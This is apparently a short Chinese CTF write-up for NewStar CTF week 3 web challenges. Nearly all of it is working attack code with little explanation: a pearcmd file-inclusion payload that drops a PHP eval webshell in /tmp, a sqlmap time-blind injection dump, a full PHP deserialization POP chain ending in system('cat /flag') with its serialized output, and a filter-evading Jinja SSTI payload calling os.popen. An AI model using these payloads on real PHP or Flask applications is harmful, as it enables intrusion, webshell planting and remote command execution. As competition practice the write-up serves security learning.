NewStar CTF WEEK3

Include 🍐

pearcmd文件包含,用bp发包防止payload被编码

1
?+config-create+/&file=/../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/tmp/chuling2.php

最终exp

1
2
3
4
GET:
?file=/tmp/chuling2
POST:
1=phpinfo();

后面就是命令执行了

medium_sql

sqlmap一把梭,时间盲注

1
python sqlmap.py -u url/?id= -p id -D ctf -T here_is_flag -C flag --dump --batch

POP Gadget

简单的pop链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
<?php
highlight_file(__FILE__);

class Begin{
    public $name;

    public function __destruct()
    {
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}

class Then{
    public $func;

    public function __toString()
    {
        ($this->func)();  //$this->func=new 类名();
        return "Good Job!";
    }

}

class Handle{
    public $obj;

    public function __call($func, $vars)
    {
        echo "call";
        $this->obj->end();
    }

}

class Super{
    public $obj;
    public function __invoke()  //  字母数字()
    {
        echo "invoke";
        $this->obj->getStr();
    }

    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    public $handle;

    public function end()
    {
        echo "end";
        unset($this->handle->log);
    }

}

class WhiteGod{
    public $func;
    public $var;

    public function __unset($var)
    {
        ($this->func)($this->var);
    }
}

$a = new Begin();
$a->name = new Then();
$a->name->func = new Super();
$a->name->func->obj = new Handle();
$a->name->func->obj->obj = new CTF();
$a->name->func->obj->obj->handle = new WhiteGod();
$a->name->func->obj->obj->handle->func='system';
$a->name->func->obj->obj->handle->var='cat /flag';
echo urlencode(serialize($a));
//O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A3%3A%22var%22%3Bs%3A4%3A%22ls+%2F%22%3B%7D%7D%7D%7D%7D%7D

GenShin

过滤了双{,使用{和%绕过,这里是直接用了之前某次ssti的exp直接getshell了

1
{%print(config|attr("_""_cla""ss_""_")|attr("_""_in""it_""_")|attr("_""_glo""bals_""_")|attr("_""_get""item_""_")("o""s")|attr("po""pen")("ls")|attr("re""ad")())%}

R!!!C!!!E!!!

应该可以盲注,这里使用

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);
class minipop{
    public $code="cat /flag_is_h3eeere|script result1";
    public $qwejaskdjnlka;
}


$a = new minipop();
$a->qwejaskdjnlka = new minipop();
echo serialize($a);
?>

OtenkiGirl

猜个原型链污染,学ing